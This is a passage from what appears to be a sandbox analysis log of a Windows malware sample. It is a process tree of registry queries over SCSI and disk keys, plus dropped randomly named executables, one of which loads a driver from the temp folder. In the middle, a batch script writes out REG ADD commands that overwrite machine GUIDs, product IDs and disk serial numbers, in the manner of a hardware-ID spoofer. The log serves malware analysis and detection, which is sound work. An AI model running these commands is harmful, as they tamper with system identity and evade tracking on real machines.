C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Interrupt REG_DWORD 0x6\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4072 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:716
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0"6⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:3976
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵PID:5108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:3372
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4760 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 2\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:4092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 3\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:1512
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 3\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:5048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 4\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:3684
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 4\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 5\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:1768 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 5\Target Id 0\Logical Unit Id 0"6⤵PID:3540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4924 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2"6⤵PID:4044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Port 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:3728
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Port 2\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:4668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:2360
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵PID:3784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Driver REG_SZ vhdmp\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:2948
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Driver REG_SZ vhdmp\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:4236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:3732
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:388
-
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe"C:\Users\Admin\AppData\Local\Microsoft\HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1836
-
-
C:\Users\Admin\AppData\Local\Microsoft\RXIsaMSgExwsQRZvqeJdCLzcPXqSvl.exe"C:\Users\Admin\AppData\Local\Microsoft\RXIsaMSgExwsQRZvqeJdCLzcPXqSvl.exe" C:\Windows\temp\rJDgWMBlfdUqZqlwLFYFkMkTFYfcDW.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:3768
-
-
C:\Windows\Cursors\lSkEiMlDipseAiVZmeaeMXgcfZjaxg.exe"C:\Windows\Cursors\lSkEiMlDipseAiVZmeaeMXgcfZjaxg.exe"3⤵
- Executes dropped EXE
PID:4756 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ptiuvqj.bat""4⤵PID:2940
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:736
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:2988
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:1128
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:4404
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:4280
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
- System Location Discovery: System Language Discovery
PID:4548
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:2968
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:3676
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:4948
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵PID:2176
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d F80D9FF3AFFEBC6D /f5⤵PID:2188
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"5⤵
- Enumerates system info in registry
PID:708
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 1414131-ae85b375-A /f5⤵
- Enumerates system info in registry
PID:4532
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"5⤵
- Enumerates system info in registry
PID:1468
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5024
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"5⤵
- Enumerates system info in registry
PID:3032
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"5⤵
- Enumerates system info in registry
PID:2020
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3224
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"5⤵
- Enumerates system info in registry
PID:4832
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"5⤵
- Enumerates system info in registry
PID:464
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"5⤵
- Enumerates system info in registry
PID:4728
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"5⤵
- Enumerates system info in registry
PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4704 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"6⤵PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0" 2>nul5⤵PID:2828
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0"6⤵PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Port 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:1132
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Port 0\Target Id 0\Logical Unit Id 0"6⤵PID:460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Interrupt REG_DWORD 0x7\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:3712
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Interrupt REG_DWORD 0x7\Target Id 0\Logical Unit Id 0"6⤵PID:2244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:1596
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:3536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:2612 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0"6⤵PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:2676
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:4976
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:2916
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵
- System Location Discovery: System Language Discovery
PID:2956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:4600
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:4904
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵PID:3872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:416 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:2164
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:2356
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:1252
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵PID:3128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:2700 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:3920
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵PID:2484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:3352
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:3156
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵PID:4200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:3588
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0"6⤵PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:2480
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:3732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:3944
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:4344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:824
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:4140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:1752
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:376
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 2\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 3\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:2960
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 3\Target Id 0\Logical Unit Id 0"6⤵PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 4\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4692 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 4\Target Id 0\Logical Unit Id 0"6⤵PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 5\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:64 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 5\Target Id 0\Logical Unit Id 0"6⤵PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1" 2>nul5⤵PID:2808
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1"6⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Port 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:2132
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Port 1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Interrupt REG_DWORD 0x6\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:2752 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Interrupt REG_DWORD 0x6\Target Id 0\Logical Unit Id 0"6⤵PID:2456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:5080
-
